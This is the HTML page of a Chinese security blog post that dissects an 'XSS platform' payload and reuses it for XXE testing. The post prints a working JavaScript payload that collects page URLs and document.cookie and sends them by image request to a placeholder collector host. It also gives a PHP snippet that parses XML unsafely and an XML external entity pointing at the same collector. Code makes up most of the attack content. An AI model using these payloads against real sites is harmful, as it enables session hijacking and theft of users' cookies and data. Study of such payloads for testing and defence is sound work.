<!DOCTYPE html>



  


<html class="theme-next mist use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Web安全," />










<meta name="description" content="XSS平台研究代码1234567891011121314151617181920212223242526272829303132(function() &amp;#123;    (new Image())    .src &#x3D; &#39;https:&#x2F;&#x2F;&amp;#123;domain&amp;#125;?do&#x3D;api&amp;id&#x3D;&amp;#123;id&amp;#125;&amp;location&#x3D;&#39; + escape((function">
<meta property="og:type" content="article">
<meta property="og:title" content="XSS平台研究">
<meta property="og:url" content="http://yoursite.com/2020/07/23/XSS%E5%B9%B3%E5%8F%B0%E7%A0%94%E7%A9%B6/index.html">
<meta property="og:site_name" content="Oah&#39;s Blog">
<meta property="og:description" content="XSS平台研究代码1234567891011121314151617181920212223242526272829303132(function() &amp;#123;    (new Image())    .src &#x3D; &#39;https:&#x2F;&#x2F;&amp;#123;domain&amp;#125;?do&#x3D;api&amp;id&#x3D;&amp;#123;id&amp;#125;&amp;location&#x3D;&#39; + escape((function">
<meta property="og:image" content="http://yoursite.com/2020/07/23/XSS%E5%B9%B3%E5%8F%B0%E7%A0%94%E7%A9%B6/63eb91e9acee029a1f06c5e14d242e1a.png">
<meta property="article:published_time" content="2020-07-23T01:35:38.000Z">
<meta property="article:modified_time" content="2020-07-23T01:36:16.507Z">
<meta property="article:author" content="Oah">
<meta property="article:tag" content="Web安全">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://yoursite.com/2020/07/23/XSS%E5%B9%B3%E5%8F%B0%E7%A0%94%E7%A9%B6/63eb91e9acee029a1f06c5e14d242e1a.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":true,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2020/07/23/XSS平台研究/"/>





  <title>XSS平台研究 | Oah's Blog</title>
  








<meta name="generator" content="Hexo 4.2.0"></head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Oah's Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2020/07/23/XSS%E5%B9%B3%E5%8F%B0%E7%A0%94%E7%A9%B6/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Oah">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Oah's Blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">XSS平台研究</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2020-07-23T09:35:38+08:00">
                2020-07-23
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="XSS平台研究"><a href="#XSS平台研究" class="headerlink" title="XSS平台研究"></a>XSS平台研究</h1><h2 id="代码"><a href="#代码" class="headerlink" title="代码"></a>代码</h2><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line">(<span class="function"><span class="keyword">function</span>(<span class="params"></span>) </span>&#123;</span><br><span class="line">    (<span class="keyword">new</span> Image())</span><br><span class="line">    .src = <span class="string">'https://&#123;domain&#125;?do=api&amp;id=&#123;id&#125;&amp;location='</span> + <span class="built_in">escape</span>((<span class="function"><span class="keyword">function</span>(<span class="params"></span>) </span>&#123;</span><br><span class="line">        <span class="keyword">try</span> &#123;</span><br><span class="line">            <span class="keyword">return</span> <span class="built_in">document</span>.location.href</span><br><span class="line">        &#125; <span class="keyword">catch</span> (e) &#123;</span><br><span class="line">            <span class="keyword">return</span> <span class="string">''</span></span><br><span class="line">        &#125;</span><br><span class="line">    &#125;)()) + <span class="string">'&amp;toplocation='</span> + <span class="built_in">escape</span>((<span class="function"><span class="keyword">function</span>(<span class="params"></span>) </span>&#123;</span><br><span class="line">        <span class="keyword">try</span> &#123;</span><br><span class="line">            <span class="keyword">return</span> top.location.href</span><br><span class="line">        &#125; <span class="keyword">catch</span> (e) &#123;</span><br><span class="line">            <span class="keyword">return</span> <span class="string">''</span></span><br><span class="line">        &#125;</span><br><span class="line">    &#125;)()) + <span class="string">'&amp;cookie='</span> + <span class="built_in">escape</span>((<span class="function"><span class="keyword">function</span>(<span class="params"></span>) </span>&#123;</span><br><span class="line">        <span class="keyword">try</span> &#123;</span><br><span class="line">            <span class="keyword">return</span> <span class="built_in">document</span>.cookie</span><br><span class="line">        &#125; <span class="keyword">catch</span> (e) &#123;</span><br><span class="line">            <span class="keyword">return</span> <span class="string">''</span></span><br><span class="line">        &#125;</span><br><span class="line">    &#125;)()) + <span class="string">'&amp;opener='</span> + <span class="built_in">escape</span>((<span class="function"><span class="keyword">function</span>(<span class="params"></span>) </span>&#123;</span><br><span class="line">        <span class="keyword">try</span> &#123;</span><br><span class="line">            <span class="keyword">return</span> (<span class="built_in">window</span>.opener &amp;&amp; <span class="built_in">window</span>.opener.location.href) ? <span class="built_in">window</span>.opener.location.href : <span class="string">''</span></span><br><span class="line">        &#125; <span class="keyword">catch</span> (e) &#123;</span><br><span class="line">            <span class="keyword">return</span> <span class="string">''</span></span><br><span class="line">        &#125;</span><br><span class="line">    &#125;)());</span><br><span class="line">&#125;)();</span><br><span class="line"><span class="keyword">if</span>(<span class="string">''</span> == <span class="number">1</span>) &#123;</span><br><span class="line">    keep = <span class="keyword">new</span> Image();</span><br><span class="line">    keep.src = <span class="string">'https://&#123;domain&#125;?do=keepsession&amp;id=&#123;id&#125;&amp;url='</span> + <span class="built_in">escape</span>(<span class="built_in">document</span>.location) + <span class="string">'&amp;cookie='</span> + <span class="built_in">escape</span>(<span class="built_in">document</span>.cookie)</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure>

<ul>
<li>直接看压缩后的代码会觉得这个payload很复杂</li>
<li>但是实际上格式化之后，会发现它的步骤很简单<ul>
<li>利用 <code>document.location.href</code>，<code>top.location.href</code>，<code>document.cookie</code>，<code>(window.opener &amp;&amp; window.opener.location.href) ? window.opener.location.href : &#39;&#39;</code> 分别获取当前页面的URL，顶层页面URL，Cookie和父窗体的URL</li>
<li>将信息包含在GET请求中发送到XSS平台，其中的id参数是指定XSS平台的项目</li>
</ul>
</li>
<li>知道这个URL之后，就可以自己编写payload了</li>
</ul>
<h2 id="new-Image"><a href="#new-Image" class="headerlink" title="(new Image())"></a>(new Image())</h2><ul>
<li>在括号内new一个对象，就可以生成一个匿名对象，直接调用</li>
</ul>
<h2 id="function"><a href="#function" class="headerlink" title="(function(){})()"></a>(function(){})()</h2><ul>
<li>立即执行函数，IIFE (Immediately Invoked Function Expression)</li>
<li>直接声明函数是不会执行的，而且需要给函数命名</li>
<li>这个方法可以声明一个匿名函数，而且直接执行</li>
</ul>
<h1 id="通过XSS平台利用XXE"><a href="#通过XSS平台利用XXE" class="headerlink" title="通过XSS平台利用XXE"></a>通过XSS平台利用XXE</h1><ul>
<li>在挖掘XXE漏洞的时候，因为不想泄露自己的云服务器，就没有合适的工具来利用</li>
<li>XSS平台的本质是发送请求到平台的地址，这个原理XXE漏洞也是通用的</li>
<li>所以将xml文件中的SYSTEM的参数设置为XSS平台的URL，就可以在XSS平台接收到消息</li>
</ul>
<h2 id="php代码"><a href="#php代码" class="headerlink" title="php代码"></a>php代码</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$handle = fopen(<span class="string">'xxe.xml'</span>, <span class="string">'r'</span>);</span><br><span class="line">$content = <span class="string">''</span>;</span><br><span class="line"><span class="keyword">while</span>(!feof($handle))&#123;</span><br><span class="line">    $content .= fread($handle, <span class="number">8080</span>);</span><br><span class="line">&#125;</span><br><span class="line">fclose($handle);</span><br><span class="line">simplexml_load_string($content);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<h2 id="xml代码"><a href="#xml代码" class="headerlink" title="xml代码"></a>xml代码</h2><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?xml version="1.0"?&gt;</span></span><br><span class="line"><span class="meta">&lt;!DOCTYPE <span class="meta-keyword">test</span> [</span></span><br><span class="line"><span class="meta">    <span class="meta">&lt;!ENTITY <span class="meta-keyword">xxe</span> <span class="meta-keyword">SYSTEM</span> <span class="meta-string">"https://&#123;domain&#125;?do=api&amp;id=&#123;id&#125;&amp;location=1&amp;toplocation=2&amp;cookie=3&amp;opener="</span>&gt;</span></span></span><br><span class="line"><span class="meta">]&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">xxe</span>&gt;</span><span class="symbol">&amp;xxe;</span><span class="tag">&lt;/<span class="name">xxe</span>&gt;</span></span><br></pre></td></tr></table></figure>

<h2 id="成功"><a href="#成功" class="headerlink" title="成功"></a>成功</h2><p><img src="63eb91e9acee029a1f06c5e14d242e1a.png" alt="img"></p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/Web%E5%AE%89%E5%85%A8/" rel="tag"># Web安全</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2020/07/22/Redis%E5%8F%8D%E5%BC%B9Shell/" rel="next" title="Redis反弹Shell">
                <i class="fa fa-chevron-left"></i> Redis反弹Shell
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/9999/09/09/%E8%B5%84%E6%BA%90%E6%94%B6%E8%97%8F/" rel="prev" title="【置顶】资源收藏">
                【置顶】资源收藏 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">Oah</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/%7C%7C%20archive">
              
                  <span class="site-state-item-count">42</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">14</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#XSS平台研究"><span class="nav-number">1.</span> <span class="nav-text">XSS平台研究</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#代码"><span class="nav-number">1.1.</span> <span class="nav-text">代码</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#new-Image"><span class="nav-number">1.2.</span> <span class="nav-text">(new Image())</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#function"><span class="nav-number">1.3.</span> <span class="nav-text">(function(){})()</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#通过XSS平台利用XXE"><span class="nav-number">2.</span> <span class="nav-text">通过XSS平台利用XXE</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#php代码"><span class="nav-number">2.1.</span> <span class="nav-text">php代码</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#xml代码"><span class="nav-number">2.2.</span> <span class="nav-text">xml代码</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#成功"><span class="nav-number">2.3.</span> <span class="nav-text">成功</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Oah</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Mist</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
          <span id="scrollpercent"><span>0</span>%</span>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
